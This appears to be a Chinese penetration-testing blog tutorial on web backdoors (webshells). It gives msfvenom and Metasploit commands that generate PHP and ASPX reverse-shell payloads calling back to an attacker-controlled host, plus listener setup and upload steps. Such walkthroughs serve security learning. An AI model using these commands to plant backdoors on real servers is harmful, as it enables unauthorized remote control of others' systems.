MSF:Web 后门
Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性)
Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具,例如 “中国蚁剑” 和 Cknife,均支持 Mac、Linux 和 Windows。在 Kali 下,用的比较多的就是 Weevely,Weevely支持的功能很强大,使用 http 头进行指令传输,唯一的缺点就是只支持 PHP。其实 Metasploit 框架中也自带了 Web 后门,配合 Meterpreter 使用时,功能更强大。
msfvenom -help //查询msfvenom使用指南
msfvenom --list formats //msfvenom支持输出格式
1.Meterpreter 后门
在 Metasploit 中,有一个名为 PHP Meterpreter 的 Payload,利用这个模块可创建具有 Metapreter 功能的 PHP WebShell。在攻击中使用的 Metasploit PHP Shell 的步骤如下
- 使用 msfvenom 创建一个 webshell.php
- 上传 webshell.php 到目标服务器
- 运行 Metasploit multi-handler 开始监听
- 访问 webshell.php 页面
- 获得反弹的 Metasploit Shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.130 -f raw > test.php
-p:设置payload
-f:设置输出文件格式
设置监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.110.130
2.Aspx Meterpreter
metasploit 下名为 shell_reverse_tcp 的 Payload ,利用这个模块可创建具有 Meterpreter 功能的各版本的 ShellCode,例如比较常见的 Asp,Aspx,msi,vbs,war等
ASP
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASP文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本置标语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也可以包含文本、HTML(包括相关的客户端脚本)和com组件调用。
Aspx
aspx文件是微软的在服务器端运行的动态网页文件,
属于ASP.NET技术。ASP.NET是由微软在·NET Framework框架中所提供,开发Web应用程序的类库,封装在System.Web.dll文件中,显露出System.Web命名空间,并提供ASP.NET网页处理、扩充以及HTTP通道的应用程序与通信处理等工作,以及Web Service的基础架构。ASP.NET是ASP技术的后继者,但它的发展性要比ASP技术强大许多。
VBS
VBS是基于Visual Basic的脚本语言。VBS的全称是:Microsoft Visual Basic Script Edition。(微软公司可视化BASIC脚本版)。
Aspx Meterpreter 后门 与 PHP shell 差不多
show payloads
use windows/shell_reverse_tcp //简单执行命令
info
set LHOST 192.168.110.130
set LPORT 4444
save
generate -f asp //生成Asp版本的ShellCode
generate -f aspx //生成Aspx版本的ShellCode
生成 aspx 版本的shellcode 保存(默认/root),上传到目标服务器
generate -f aspx -o test.aspx
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.110.130
set LPORT 4444
MSF:Web 后门相关推荐
- Web后门工具WeBaCoo
Web后门工具WeBaCoo WeBaCoo是使用Perl语言编写的Web后门工具.渗透测试人员首先使用该工具生成一个后门PHP页面.然后,将该页面上传到目标服务器上.最后,在本地终端直接访问该页面, ...
- Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门
WeBaCoo WeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具.借助HTTP协议,它可以在客户端和服务器端实现执行代码的网页终端. WeBaCoo有两种工作模 ...
- web后门隐藏与检测思路
跟我一起念后门口诀:挑.改.藏.隐 来个例子先,例一: 只因为在目录里多瞅了一眼,只一眼,就认出了你.为什么你是那么的出众? 可疑点:文件名.时间.大小.(有点经验的人能很快发现这些上传的***文件) ...
- kali下生成web端后门
很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了. ...
- Web安全防攻(渗透测试)
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache.Nginx.MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包. 首先,下载需要的安装包 ...
- web安全攻防渗透测试笔记
第三章sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量p ...
- msf 直接控制大多数设备
这是我2016年写的一个博客,记录了一个入侵demo,原来的博客快支撑不下去了,现在转移到这来,以后还可以捡起来-以前的博客还是很稚嫩啊- 注:获取目的主机的IP以及诱使目的主机下载并运行木马可以通过 ...
- 红蓝对抗之隧道技术第一篇(内网穿透、端口映射端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)
文章目录 隧道应用 端口映射&端口转发 Netsh端口转发 Netsh端口转发meterpreter CS正向连接多层内网 CS反向连接多层内网 Burp设置上游代理访问内网 MSF prot ...
- web安全攻防渗透测试笔记 (信安一班 李静)
第三章sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量p ...
最新文章
- java操作跨页的word cell,“excle如何打印不出现断行“EXCEL中,如何不跨页断行打印或显示,谢谢...
- review what i studied `date` - 2017-4-12
- DataRow判断列名是否存在
- Java连接Oracle数据库常用方法
- 基础篇-verilog-按位与和逻辑与
- 木糖醇、可口可乐零度:可怕的传闻
- PHP 与Memcache 分布式
- C++ 有参构造 无参构造 拷贝构造 以及参数化列表 成员对象之间的执行关系
- python如何设置双索引_python – 设置值多索引熊猫
- php 替换 数组,php如何替换数组的值
- Flask:an ImportError was raised问题解决
- Mac 安装mysql5.7.29
- 使用双显示器时其中一个屏幕出现重影的问题——缺少吸收磁环
- 短线交易秘诀---大小价格区间,开盘价,价格爆炸点
- 苹果手机该如何拍摄证件照
- 原理 + 代码 | Apriori 算法与基于关联规则的购物篮推荐
- 苹果浏览器Safari
- 时间复杂度分析:递归算法
- A/D转换器(ADC)
- 《介绍一款开源的类Excel电子表格软件》续:七牛云存储实战(C#)
热门文章
- @Transactional又双叒叕失效了?
- 在线视频ais_王牌如何从在线ais演变而来
- 35.在layer上画文字 画图片
- 【Docker篇】Docker镜像加载原理,UnionFS(联合文件系统),镜像Commit
- 解决电脑开机输入BitLocker密钥才能进入系统的问题
- 找参考图的同志们看过来,分享几个建模参考网站给你们。再不用愁啦
- 小程序的gridview布局
- GPS/BD陶瓷天线
- Hadoop问题解决集合
- Ubuntu 16.04安装NVIDIA驱动(含各种踩坑经历)(GeForce GTX 970)